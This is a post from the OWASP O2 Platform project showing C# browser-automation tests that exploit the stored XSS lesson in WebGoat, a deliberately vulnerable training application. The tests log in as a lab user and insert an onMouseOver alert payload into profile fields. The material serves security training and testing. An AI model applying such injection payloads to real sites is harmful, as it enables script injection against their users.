WebGoat – First Example of O2 WebGoat API
This script and video shows a first example of the API that will be developed under O2 that will automate WebGoat’s funcionality, Lessons and Exploits
The WebGoat scripts are included in the local O2 Scripts folder and can also be seen here
Video: WebGoat – First Example of O2′s WebGoat API
Source Code: unit tests from WebGoat_BlackBox_Exploits.cs
public string Open_Main_Page()
{
setup();
webGoat.openMainPage();
var pageHtml = ie.html();
Assert.That(pageHtml.contains("WebGoat"),"Could not find the word WebGoat in the default page");
if (ie.hasButton("Start WebGoat"))
ie.button("Start WebGoat").flash().click();
return "ok";
}
[Test]
public string Exploit_Stage_1_Stored_XSS_OK()
{
return Exploit_Stage_1_Stored_XSS("address1");
}
[Test]
public string Exploit_Stage_1_Stored_XSS_Fail()
{
return Exploit_Stage_1_Stored_XSS("description");
}
private string Exploit_Stage_1_Stored_XSS(string fieldToInsertPayload)
{
setup();
var payload = "<a href=\"\" onMouseOver=\"javascript:alert('xss')\">Over me to see xss</a>";
webGoat.openMainPage();
ie.link("Cross-Site Scripting (XSS)").flash().click();
ie.link("LAB: Cross Site Scripting").flash().click();
ie.link("Stage 1: Stored XSS").flash();
ie.field("password").flash().value("larry");
ie.button("Login").flash().click();
ie.selectLists()[1].options()[0].select().flash();
ie.button("ViewProfile").flash().click();
ie.button("EditProfile").flash().click();
ie.field(fieldToInsertPayload).value(payload).flash();
ie.button("UpdateProfile").flash().click();
Assert.That(ie.html().contains("onmouseover=\"javascript:alert('xss')\""), "Payload was not inserted into page");
return "ok";
}
[Test]
public string Stage_1_Stored_XSS_Restart_Lesson()
{
setup();
webGoat.openMainPage();
ie.link("Cross-Site Scripting (XSS)").flash().click();
ie.link("LAB: Cross Site Scripting").flash().click();
ie.link("Stage 1: Stored XSS").flash().click();
ie.link("Restart this Lesson").flash().click();
return "ok";
}
About
The O2 platform represents a new paradigm for how to perform, document and distribute Web Application security reviews. O2 is designed to Automate Security Consultants Knowledge and Workflows and to Allow non-security experts to access and consume Security Knowledge.
O2 can also be a very powerful prototyping and fast-development tool for .NET. Most O2 APIs are written using a Fluent API design, and its core has been published as a separate project called FluentSharp (hosted at CodePlex)
Download
Windows ClickOnce Installer:
Mailing List
The best place to keep updated with the lastest news and developers it to subscribe to the OWASP O2 Platform Mailing list (you can read its archives here)
